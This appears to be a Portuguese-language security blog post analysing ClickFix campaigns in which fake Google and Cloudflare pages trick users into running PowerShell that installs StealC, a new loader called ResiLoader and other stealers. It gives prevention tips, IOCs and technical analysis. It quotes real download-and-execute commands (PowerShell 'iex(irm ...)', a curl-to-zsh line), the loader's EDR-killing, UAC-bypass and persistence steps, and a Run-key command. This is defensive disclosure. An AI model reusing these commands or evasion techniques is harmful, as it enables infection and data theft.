Os ataques do tipo ClickFix, que levam as pessoas a executarem comandos maliciosos por conta própria, continuam a evoluir. Essa campanha mais recente utiliza páginas falsas de verificação do Google e da Cloudflare para convencer as vítimas a infectarem seus próprios dispositivos.
Um único erro pode instalar um malware que rouba senhas e outros dados confidenciais, concede aos invasores acesso remoto ao seu computador ou baixa outros malwares capazes de assumir o controle total do seu sistema.
Descobrimos várias campanhas que utilizavam a mesma infraestrutura para distribuir malware, incluindo HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport e um stealer baseado em Rust.
Em uma cadeia de infecção, uma versão trojanizada do aplicativo legítimo de mensagens Franz baixa um carregador até então não documentado, chamado ResiLoader, que desativa o software de segurança antes de implantar o infostealer StealC.
Antes de entrarmos nos detalhes técnicos, veja aqui como evitar se tornar a próxima vítima.
Como se manter seguro
Os ataques do ClickFix dependem de convencer você a executar comandos por conta própria. A abordagem mais segura é simples:
- Nunca copie e execute comandos de um site, a menos que esteja seguindo instruções de uma fonte confiável e compreenda exatamente o que o comando faz.
- Tenha cuidado com páginas de verificação. O Google, o Cloudflare, a Microsoft e outros serviços legítimos nunca pedirão que você cole comandos do PowerShell no Windows provar que é humano ou Windows resolver um problema.
- Não deixe que a urgência o apresse. Páginas falsas de verificação costumam usar contadores regressivos, contadores de visitantes ou avisos para pressioná-lo a agir rapidamente.
- Mantenha seu software de segurança atualizado. A proteção em tempo real e a proteção na web podem ajudar a bloquear sites maliciosos antes que você acesse-os.
- Desconfie de instruções técnicas inesperadas. Se um site solicitar que você abra o PowerShell, o Prompt de Comando ou o Terminal, pare e verifique as instruções por meio dos canais oficiais de suporte da empresa.
Dica profissional: Malwarebytes Browser Guard pode alertá-lo quando um site tentar copiar conteúdo para a sua área de transferência — um truque comum usado pelas páginas do ClickFix.
Análise técnica
As campanhas analisadas nesta pesquisa estão ativas desde, pelo menos, o final de 2025 e utilizam uma variedade de páginas falsas do Google e da Cloudflare para distribuir malware. Embora as iscas sejam diferentes, elas compartilham grande parte da mesma infraestrutura e cadeia de infecção, com os invasores testando continuamente novos métodos de distribuição e cargas maliciosas.
Iscas diferentes, um único objetivo
A maioria das campanhas apresenta várias características em comum:
- Como usar a pasta
C:\ProgramData\Zoomspara extrair os estágios posteriores - Comandos do PowerShell ClickFix que seguem padrões semelhantes
- Uso de buckets do Cloudflare R2 para distribuir cargas úteis
- Endereços IP hospedados pela ASN Dedik Services Limited
- Respostas em HTML que contenham apenas a frase
"hehe"
Esses indicadores mudaram ao longo do tempo, por isso não aparecem em todas as cadeias de infecção. As campanhas continuam a evoluir, com novas cargas maliciosas e métodos de distribuição sendo introduzidos regularmente. Por exemplo, em alguns casos, o endereço IP é usado diretamente para a distribuição da carga maliciosa, em vez de buckets.
O comando final copiado pelo usuário geralmente segue este padrão:
powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”
A porta e o caminho nem sempre estão presentes nos casos analisados; as portas são aleatórias, mas algumas das utilizadas são: 6600, 9900, 5506, 7895, 7493, 149, 8442.
Para executar esses comandos, são utilizados vários modelos relacionados ao ClickFix, principalmente ligados ao Google e ao Cloudflare. Também detectamos que, em alguns casos, o comando do PowerShell foi distribuído por meio da estrutura IClickFix.
Observamos que essas campanhas do ClickFix estavam sendo divulgadas por meio de:
- Sites antigos que provavelmente expiraram e foram readquiridos pelo(s) autor(es).
- CloudFlare Pages (
.pages.devdomínios). - Sites comprometidos.
- Serviços falsos, por exemplo, relacionados a códigos QR ou acesso a arquivos na web.
O Google ClickFix atrai
Os responsáveis por essas campanhas utilizam diversas páginas HTML e kits relacionados ao Google.
Uma isca se faz passar pela verificação do Google reCAPTCHA. As páginas estão hospedadas em URLs aleatórios que exibem conteúdo falso ou malicioso. Esses domínios costumam ser registros antigos que recentemente passaram a apontar para novos endereços IP, o que sugere que foram reaproveitados para a campanha.
Algumas dessas páginas possuem parâmetros de URL como “zoneid”, “cost”, “device”, “country” e “clickid”, por exemplo:
/conf/captcha.html?zoneid=10420852/wincapbot/nobot.html/xmr/trkuste.php?zone=5327134bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop


Nesse caso, as funções relacionadas ao ClickFix estão implementadas na classe CustomCaptcha. O comando está escrito em texto simples, sem qualquer ofuscação.

Outro método de distribuição utiliza o Cloudflare Pages hospedado em .pages.dev subdomínios.

Nesse caso, a página HTML é ofuscada por meio da declaração de várias variáveis e da aplicação da operação XOR entre elas. O código desofuscado é chamado de SECURITY GATEWAY e é composto pelas funções GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenControllere PanelController.
O código permite que os invasores recuperem o comando remotamente ou localmente. Neste exemplo, o comando malicioso do PowerShell está armazenado localmente.

Também descobrimos que alguns desses domínios já haviam distribuído outro isco no passado, neste caso associado a um login não autorizado no Google. Esse isco do ClickFix pede ao usuário que copie e cole o comando malicioso para definir seu dispositivo como principal.

O que chama a atenção nesse kit ClickFix é que ele possui um “portão de aprovação”, conforme descrito nos comentários, e que o invasor precisa selecionar manualmente, no painel, qual comando o usuário deverá executar.


Em campanhas mais recentes, detectamos uma isca do ClickFix relacionada ao Google Meet, que exige que se copie e cole um comando malicioso para corrigir problemas de áudio.

Nos casos analisados, o desfecho /api/driver-clipboard.php retornou o seguinte comando malicioso:
{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""}
Outras iscas
Os responsáveis por essa campanha utilizam diversos kits e iscas, em sua maioria relacionados ao Google. No entanto, detectamos outras iscas que copiavam comandos relacionados à mesma infraestrutura.
Os invasores por trás dessas campanhas também comprometem vários sites usando diferentes modelos relacionados à isca do CloudFlare ClickFix.


Detectamos vários modelos utilizados nas páginas do CloudFlare. O comando está presente de forma visível ou, em alguns casos, ofuscado nos casos analisados.



Também detectamos alguns sites falsos criados especificamente para oferecer serviços. Por exemplo, um site chamado “My QR Generator” exibe um código QR ofuscado e solicita que o usuário execute um comando do PowerShell para comprovar que não é um robô.

Nesse caso, o comando está codificado em base-64:

Programa para baixar o PowerShell
O comando ClickFix executado pelo usuário decodifica um script e o salva na pasta Temp com o nome tmp{4 char}.tmp.ps1.
Detectamos várias variações desse script, mas as versões mais recentes fazem o seguinte:
- Crie a pasta
C:\ProgramData\Zooms. - Baixe a próxima etapa de um bucket do CloudFlare e salve-a em
C:\ProgramData\Zooms. Em algumas variantes do script, a próxima etapa é baixada diretamente de um endereço IP. - Envie as informações do computador comprometido para
http://{IP}/dl-callback. Em algumas variantes do roteiro, essa parte não está presente.

Os invasores por trás dessas campanhas utilizam um grande número de cargas úteis diferentes. As campanhas distribuem uma ampla variedade de cargas úteis. A tabela abaixo resume alguns dos nomes dos arquivos baixados e o malware que eles instalam. Em muitos dos casos analisados, a carga útil final foi distribuída por meio do sequestro de DLL, como também veremos mais adiante no caso do StealC.
| Arquivo distribuído | Malware distribuído |
libEGL.zip, Safe-1.zip | Aplicativo Electron com código malicioso, ResiLoader e StealC |
Test.msi | Deno Loader e PowerShell Stealer |
arworks.zip | Amatera Stealer |
water-night.zip | Remus Stealer |
Setup.msi, Invintrum_first.msi | NetSupport |
traffic1.msi | CastleLoader |
ibrowser.exe | Ladrão de Ferrugem |
Analisamos um novo carregador chamado ResiLoader, que, em última instância, distribui o StealC. Também detectamos que o autor da ameaça, nas campanhas mais recentes, passou a usar o Deno para distribuir, por fim, um stealer desenvolvido em PowerShell; a análise dessa cadeia de infecção poderá ser tema de uma futura postagem no blog.
O aplicativo Electron infectado com um trojan faz o download do ResiLoader
Nesse caso, o arquivo ZIP foi baixado de:
pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip
Após a extração para:
C:\ProgramData\Zooms\libEGL.zip_ext
O arquivo zip contém uma versão infectada com um trojan do aplicativo de mensagens de código aberto chamado “Franz”:

O código malicioso está implementado no index.js arquivo:

O programa de download realiza as seguintes operações:
- Decodifique as sequências de caracteres com a função
HC(). - Leituras
readme.txt, espera uma chave de campanha no formatoAAAA-BBBB, retorna como uma matriz de tokens. Nesse caso, o nome éresiloader-1e, por isso, chamamos a DLL baixada de “ResiLoader”. - Leituras
%APPDATA%\setup.txt; se estiver ausente, gera uma sequência aleatória de 8 caracteres e a armazena. - Como obter persistência usando
app.setLoginItemSettings. - Envia uma solicitação POST para
https[:]//completstep[.]com/api/e elaborar a resposta em JSON- Se
task.ese estiver presente, ele é executadoeval(task.e); isso permite que o invasor execute código JavaScript arbitrário. - Se
task.filesse estiver presente, crie%TEMP%\<Date.now()>\, decodificar e gravar cada arquivo; se algum nome de arquivo terminar em.exe, execute-o por meio dechild_process.exec.
- Se
No nosso caso, recebemos um arquivo ZIP que realiza o sequestro de DLL de ssh-add.exe:
{"task":{"name":"JUNE18USY","files":{
"msys-2.0.dll":"<base64>",
"msys-crypto-3.dll":"<base64>",
"msys-gcc_s-seh-1.dll":"<base64>",
"ssh-add.exe":"<base64>" }}}
Em seguida, o executável foi executado com:
C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe""
ResiLoader
O msys-crypto-3.dll é um código ofuscado .NET NativeAOT loader que implementa a evasão de antivírus/EDR por meio de uma técnica BYOD, obtém persistência e, por fim, carrega o roubador de dados StealC. Não encontramos uma atribuição específica para esse carregador e, por isso, o chamamos de “ResiLoader”, com base na string presente em versões anteriores readme.txt.
O carregador contém várias sequências de caracteres, algumas em texto simples e outras criptografadas. Após descriptografar essas sequências, é possível ter uma visão completa da funcionalidade do ResiLoader.
MANPO: ReadModule len=...
MANPO: magicOffset=...
…
PERS: FAIL all file copies failed, skipping run key
PERS: FAIL both HKLM and HKCU Run key writes failed
…
RUNPE: CreateProcess failed
RUNPE: PEB patched
RUNPE: VirtualAllocEx failed
…
POST: RunForever exited (unexpected)
POST: entering RunForever
POST: hollow=
A carregadeira realiza as seguintes operações:
- Extraia o blob codificado que contém duas cargas úteis, lendo o marcador
AtLorenBasee o comprimento do blob codificado. Em seguida, ele decodifica o blob e descriptografa o driverpcdhost.sys(OPSWAT
(AppRemover Driver) e a carga útil StealC, utilizando um algoritmo de descriptografia personalizado. - Encerre mais de 140 processos relacionados a EDR/AV usando o driver desativado.
- Contornar o UAC por meio de
ICMLuaUtilInterface COM elevada. - Criar uma pasta
C:\ProgramData\Google Update, copiando-se a si mesmo; adicionando persistência por meio da chave de registro RUN cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe
Por fim, o carregador realiza o esvaziamento do processo ServiceModelReg.exe para executar o StealC.
IOCs
Hash
72907d0ca3258365838626f6a8d993a6: DLL do ResiLoader
0234E3188F2883A438B3F2BEAB7A78B2: StealC
6a9ac6b3fff7b695dbd4df6ff7f6c516: Remus
206ce339febca0c3bcc850f42595fc63: Amatera Stealer
eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT
b8d53740024d126cb55f83854335a4ab: Ladrão de Ferrugem
Domínios
Distribuir as páginas do ClickFix:
onegeekworld[.]com
thefirmos[.]com
antibotv3[.]com
centralwildcats[.]com
cloud.antibotv3[.]com
cloudautosolutions[.]com
sunseekersupply[.]com
123clocks[.]com
orcanegames[.]com
rwmonitoring[.]com
100furniture[.]com
nepalcharchaa[.]com
p-floribunds.pages[.]dev
pg-altirade2.pages[.]dev
pg-cordivant-m6.pages[.]dev
g-luminence.pages[.]dev
generator-qrcode[.]online
regdev-google[.]com
khosla[.]capital
eorgke09054909j[.]com
dropboxi[.]com
Buckets do CloudFlare utilizados para a distribuição da carga útil:
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-620528e2dc874e16937673265aa23d39.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-9682d5896df841679c5a17eb41273f89.r2[.]dev
pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev
pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
unitedstateverif[.]com: distribuição da carga útil
bigflaredefence[.]com: distribuição da carga útil
popularcard[.]shop: Rust Stealer C2
xzz[.]proxygrid[.]cc: Amatera Stealer C2
completstep[.]com: Carregador C2
eventlogerps1[.]ink: Deno Loader
be231ro963[.]com: Deno Loader
IPs
IP utilizado para a distribuição da carga útil:
151.240.151[.]126
85.239.149[.]16
85.239.149[.]40
93.152.224[.]29
151.240.151[.]46
93.152.224[.]167
85.239.149[.]78
192.69.195[.]131
135.181.171[.]40
94.26.83[.]206
91.92.34[.]128
85.239.144[.]31
93.152.224[.]39
94.26.90[.]112
146.19.248[.]120: StealC C2
Agradecimentos
- Domínio relacionado denunciado: https://x.com/stop_spammerz/status/2070152741037477960
- Domínio relacionado denunciado: https://x.com/Yuki27183/status/2047354005605777850
- Relato de infecção de um usuário no Reddit: https://www.reddit.com/r/antivirus/comments/1stn24v/best_thing_to_do_after_getting_malware/
- Possível cadeia de infecção relacionada https://github.com/MessyToilet/csgo-scam-via-powershell-5-31-2026




